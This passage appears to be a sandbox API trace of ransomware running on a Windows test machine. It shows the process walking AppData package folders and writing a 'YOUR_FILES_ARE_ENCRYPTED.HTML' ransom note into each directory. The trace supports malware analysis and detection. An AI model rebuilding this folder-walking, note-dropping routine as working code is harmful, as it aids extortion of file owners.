pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData") returned 100 [0120.142] GetProcessHeap () returned 0x600000 [0120.142] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.142] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData" [0120.143] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\*" [0120.143] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b04390b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.143] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b04390b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 1 [0120.143] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b04390b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 0 [0120.143] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.143] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0120.143] GetProcessHeap () returned 0x600000 [0120.143] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.144] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.145] CloseHandle (hObject=0x31c) returned 1 [0120.145] GetProcessHeap () returned 0x600000 [0120.145] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.145] GetProcessHeap () returned 0x600000 [0120.145] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.145] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0120.145] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.146] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState") returned 96 [0120.146] GetProcessHeap () returned 0x600000 [0120.146] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.146] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState" [0120.146] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\*" [0120.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.146] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 1 [0120.146] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 0 [0120.146] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.146] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0120.146] GetProcessHeap () returned 0x600000 [0120.146] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.159] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.167] CloseHandle (hObject=0x31c) returned 1 [0120.168] GetProcessHeap () returned 0x600000 [0120.168] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.168] GetProcessHeap () returned 0x600000 [0120.168] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.168] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0120.168] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.168] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0120.168] GetProcessHeap () returned 0x600000 [0120.168] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3106fd8 [0120.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0120.170] WriteFile (in: hFile=0x214, lpBuffer=0x3106fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3106fd8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0120.171] CloseHandle (hObject=0x214) returned 1 [0120.172] GetProcessHeap () returned 0x600000 [0120.172] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.172] GetProcessHeap () returned 0x600000 [0120.172] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0120.172] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.WIN")) returned 1 [0120.172] StrStrIW (lpFirst="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.172] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe") returned 98 [0120.172] GetProcessHeap () returned 0x600000 [0120.172] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0120.172] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe" [0120.172] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\*" [0120.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcb84880, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcb84880, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.172] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcb84880, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcb84880, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0120.172] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0120.172] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.172] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC") returned 101 [0120.172] GetProcessHeap () returned 0x600000 [0120.173] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.173] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC" [0120.173] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\*" [0120.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.174] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.174] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="BackgroundTransferApi", cAlternateFileName="BACKGR~1")) returned 1 [0120.174] StrStrIW (lpFirst="BackgroundTransferApi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.174] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi") returned 123 [0120.174] GetProcessHeap () returned 0x600000 [0120.174] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.176] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi" [0120.176] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\*" [0120.176] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0120.176] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.176] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.176] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0120.176] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 153 [0120.176] GetProcessHeap () returned 0x600000 [0120.176] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\backgroundtransferapi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.178] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.179] CloseHandle (hObject=0x320) returned 1 [0120.179] GetProcessHeap () returned 0x600000 [0120.179] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.179] GetProcessHeap () returned 0x600000 [0120.179] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.179] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0120.179] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.179] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache") returned 111 [0120.179] GetProcessHeap () returned 0x600000 [0120.179] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.179] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache" [0120.179] lstrcatW (in: 